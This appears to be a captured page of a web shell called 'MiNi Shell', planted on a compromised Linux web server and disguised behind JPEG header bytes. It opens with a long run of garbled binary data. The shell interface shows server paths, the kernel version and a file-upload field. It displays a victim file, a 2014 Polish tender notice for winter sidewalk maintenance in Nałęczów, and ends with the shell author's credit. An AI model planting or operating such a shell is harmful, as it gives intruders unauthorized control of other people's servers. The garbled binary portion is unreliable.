JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141016/345020-N-2014.html

<p class="kh_header"><b>Puławy: Usługi polegające na zimowym utrzymaniu chodników położonych wzdłuż dróg wojewódzkich na terenie miasta Nałęczów</b><br>
<b>Numer ogłoszenia: 345020 - 2014; data zamieszczenia: 16.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie - Rejon Dróg Wojewódzkich w Puławach , ul. Składowa 1A, 24-100 Puławy, woj. lubelskie, tel. 081 8863163, 8864103, faks 081 8863163.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi polegające na zimowym utrzymaniu chodników położonych wzdłuż dróg wojewódzkich na terenie miasta Nałęczów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres prac obejmuje mechaniczne i ręczne odśnieżanie oraz zwalczanie śliskości zimowej nawierzchni chodników na całej szerokości przy użyciu materiałów uszorstniających (piasek), z uwzględnieniem odcinków stanowiących dojścia do przejść dla pieszych na terenie miasta Nałęczów w ilości : 11 140,00 mb; 18 187,00 m2 .
2. Szczegółowy wykaz odcinków chodników zawiera załącznik nr 1 Wykaz i lokalizacja chodników objętych zimowym utrzymaniem na terenie miasta Nałęczów.
3. Maksymalna ilość dni prowadzenia akcji - 120.
4. Zamawiający, w zależności od warunków atmosferycznych, zastrzega sobie prawo zmniejszenia zakresu usług poprzez zmniejszenie ilości dni ich realizacji. 
5. Do obowiązków Wykonawcy należeć będzie :
a. Odśnieżanie mechaniczne oraz ręczne w miejscach niedostępnych dla sprzętu - chodników w taki sposób, aby warstwa pozostawionego śniegu nie przekraczała 2-3 cm oraz stanowiła równą powierzchnię. Niedopuszczalne jest pozostawienie na odśnieżanych odcinkach warstwy zlodowaciałego śniegu lub lodu tworzącego nierówną, pofalowaną nawierzchnię
b. Równomierne posypywanie piaskiem odśnieżonych powierzchni na całej szerokości. Niedopuszczalne jest rozsypywanie piasku zbrylonego oraz występowanie nieciągłości  w posypywaniu.
c. Wykonywanie czynności związanych z odśnieżaniem i posypywaniem  materiałem uszorstniającym na bieżąco, w zależności od warunków pogodowych i warunków panujących na chodnikach w celu zapewnienia standardu utrzymania o którym mowa w pkt. 5 a  i b.  
W przypadku opadów śniegu lub deszczu Wykonawca winien przystąpić do posypywania chodników bezpośrednio po ustaniu opadów. Po posypaniu na chodnikach winna być utrzymywana równomierna cienka warstwa piasku, zapobiegająca śliskości zimowej. 
d. Decyzję o konieczności odśnieżania lub posypywania Wykonawca podejmuje samodzielnie. 
e. Niezwłoczne przystępowanie w szczególności w godzinach 5.00 - 7.00 i 14.00 - 16.00 do posypywania nawierzchni w przypadku wystąpienia śliskości zimowej lub uzasadnionego podejrzenia co do możliwości jej wystąpienia niezależnie od opadów. 
f. Zabezpieczenie i utrzymanie w gotowości sprzętu i maszyn wraz z obsługą przewidzianych do realizacji zamówienia.
g. Zapewnienie we własnym zakresie obsługi naprawczo - remontowej sprzętu przewidzianego do świadczenia usług.
h. Zabezpieczenie we własnym zakresie materiałów do zwalczania śliskości. 
i. Załadunek materiałów własnym sprzętem i na swój koszt.
j. Niezwłoczne przekazywanie upoważnionym pracownikom Zamawiającego, za pośrednictwem osób obsługujących pojazdy i sprzęt, informacji o aktualnym stanie chodników w czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach oraz zagrożeniach spowodowanych warunkami atmosferycznymi.    
6. Warunki realizacji zamówienia: 
a. Wykonawca zobowiązuje się do zawarcia na własny koszt odpowiednich umów ubezpieczenia z tytułu odpowiedzialności cywilnej na czas realizacji zamówienia. 
Ubezpieczeniu podlega odpowiedzialność cywilna kontraktowa oraz deliktowa za szkody oraz następstwa nieszczęśliwych wypadków, dotyczące pracowników i osób trzecich, powstałe w związku z prowadzonymi pracami, w tym także ruchem pojazdów mechanicznych. Wymagana suma ubezpieczenia nie mniej niż 100 tys. złotych na jedno  i wszystkie zdarzenia.
b. Decyzję o rozpoczęciu i zakończeniu sezonu wykonywania usług objętych zamówieniem podejmować będzie Kierownik Rejonu Dróg Wojewódzkich w Puławach. 
c. Zamawiający zastrzega sobie prawo do czasowego zawieszenia wykonywania usług bez prawa do wynagrodzenia w tym okresie. 
d. Informacja o czasowym zawieszeniu usług przekazywana będzie w formie faksu lub telefonicznie i potwierdzona pisemnie. 
e. Przerwanie wykonywania usług następuje w dniu następnym po dniu, w którym Wykonawca otrzyma wiadomość o czasowym zawieszeniu. 
f. Czasowe zawieszenie usług nie może nastąpić na okres krótszy niż 2 dni.
g. Wykonawca zobowiązany jest wznowić wykonywanie usług po 2 godzinach od momentu powiadomienia o odwołaniu czasowego zawieszenia.
h. Zamawiający zastrzega sobie prawo do przeprowadzania kontroli realizacji usług. Kontrola będzie przeprowadzana w godz. 9.00 - 11.00 przy udziale przedstawiciela Wykonawcy wskazanego w umowie. Brak przedstawiciela Wykonawcy nie wstrzymuje czynności kontrolnych. Wykonawca o kontroli zostanie poinformowany telefonicznie, pocztą e-mail lub faksem na 2 godziny przed jej przeprowadzeniem
i. Z kontroli przedstawiciel Zamawiającego sporządzi protokół w którym stwierdzi wykonanie/niewykonanie usługi ewentualnie wyznaczy maksymalnie 2 godzinny termin na dokonanie niezbędnych poprawek wykonanej usługi.
j. Stwierdzenie w protokole kontrolnym (niewykonania) usługi spowoduje brak zapłaty ryczałtu za dany dzień a ponadto naliczenie kar przewidzianych w umowie.     
7. Warunki zapłaty: 
a. Fakturowanie wykonanych usług będzie odbywało się nie częściej niż raz z miesiącu.
b. Podstawą wyliczenia wartości fakturowanych usług będzie cena jednostkowa - stawka dziennego ryczałtu (zgodnie z ofertą), uwzględniającego zarówno akcję czynną jak i bierną oraz ilość dni świadczenia usług (zarówno czynne jak i bierne).
c. Zamówienie będzie realizowane maksymalnie do ceny umownej - zgodnie z ceną wybranego Wykonawcy.     
8. Zamawiający nie dopuszcza składania ofert częściowych.   
Szacunkowa wartość przedmiotowego zamówienia dla tutejszego Rejonu wynosi (bez zamówień uzupełniających) 95 915,52 zł netto na 3 sezony, 31 971,84 zł na 1 sezon.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stosownie do art. 67 ust. 1 pkt 6 ustawy PZP. Zamówienie uzupełniające polegać będzie na wykonaniu usług związanych z zimowym utrzymaniem chodników przez jednostki transportowo-sprzętowe w zakresie zgodnym z zamówieniem podstawowym, których ilość będzie zależna od występujących potrzeb.
Przewidywana wartość zamówienia uzupełniającego wynosi 50 % to jest 47 957,76 zł netto na 3 sezony, 15 985,92 zł netto na 1 sezon zimowy, objęte zamówieniem.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium, w wysokości 600,00 zł (słownie złotych: sześćset 00/100).   
2. Wadium może być wnoszone w jednej lub kilku następujących formach zgodnie z  art. 45, ust. 6 ustawy Prawo zamówień publicznych:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych, 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr  42 poz. 275, z późń. zm.).
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW w Lublinie w Bank Zachodni WBK Oddział w Lublinie nr 89 1500 1520 1215 2004 1596 0000.
4. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1. Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez zamawiającego. W myśl art. 63. ust. 3 pkt.1  ustawy Prawo bankowe z dnia 29 sierpnia 1997 (Dz. U z 2012 poz. 1376 z późn. zm.) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego.  Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. 
Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2. Wadium wnoszone przelewem (art. 45 ust. 7 ustawy Pzp) uważa się za wniesione w terminie, jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu składania ofert. 
3. Zamawiający zatrzymuje wadium wraz odsetkami zgodnie z art. 46 ust. 4 a i 5.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału polegającego na   dysponowaniu odpowiednim potencjałem technicznym w oparciu o załącznik Wykaz potencjału technicznego. Warunek zostanie spełniony, gdy Wykonawca wykaże dysponowanie (wraz z  podstawą do dysponowania) następującymi jednostkami sprzętowymi: 
a. Jednostką transportową (np. ciągnik) z posypywarką piasku i pługiem o wymiarach umożliwiających pracę na ciągach chodnikowych - 1 szt.,
b. Narzędzia ręczne (szufle, miotły, itp.) - dowolna ilość</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału polegającego na dysponowaniu osobami zdolnymi do wykonania zamówienia w oparciu o Załącznik - Wykaz osób. Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże dysponowanie (wraz z podstawą do dysponowania) osobą/osobami zdolnymi do wykonania zamówienia, tj. minimum 4 osobami przewidzianymi do ręcznego odśnieżania i usuwania oblodzeń (z wyłączeniem osób będących operatorami sprzętu)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Dowód wniesienia wadium.
2) Oferta przetargowa (z ceną netto i z podatkiem VAT) (wzór - zał. A) z załączonym Formularzem Cenowym (wzór - zał. B).
3) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
4) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian postanowień zawartej umowy w stosunku do treści oferty:
1. Zmianie wynagrodzenia w przypadku, gdy zmianie uległy stawki podatku VAT - wynagrodzenie ulegnie zmianie w ten sposób, że wynagrodzenie netto pozostanie takie samo, a wartość podatku VAT i wynagrodzenie brutto ulegną zmianie.
2. Zmianach podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku akceptacji przez Zamawiającego wskazanego innego podwykonawcy po wykazaniu, iż proponowany inny podwykonawca spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
3. Rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku wykazania Zamawiającemu, iż Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
4. Powierzeniu wykonywania zamówienia podwykonawcy gdy Wykonawca nie wskazał w złożonej ofercie udziału podwykonawców.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Puławach, ul. Składowa 1a, pok. nr 11 (cena 6,00 zł) lub pocztą elektroniczną pod adresem: rdw.pulawy@zdw.lublin.pl...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2014 godzina 09:30, miejsce: Rejon Dróg Wojewódzkich w Puławach, ul. Składowa 1a, pok. nr 12. Oferty zostaną otwarte w siedzibie jw., pok. nr 11, w dniu 27.10.2014, o godz. 10:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują faksem lub drogą elektroniczną. 
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się z Wykonawcami: 
1. W sprawach technicznych - Tomasz Kwiatkowski  - Z-ca Kierownika RDW Puławy
2. W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Artur Wiak, Aleksandra Pijanowska - Sekcja techniczna RDW Puławy. 
w godz. 08:00 - 14:00, tel. 81 886 41 03, 886 31 63.   
Uwaga: Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej Zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, mogą przesłać Zamawiającemu krótką informację zawierającą podstawowe dane firmy (nazwa, adres, nr telefonu i faksu, adres poczty elektronicznej) faksem nr 81 886 31 63 lub pocztą elektroniczną na adres rdw.pulawy@zdw.lublin.pl. 
Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, zwołaniu przez Zamawiającego zebrania wszystkich Wykonawców, przedłużeniu terminu składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com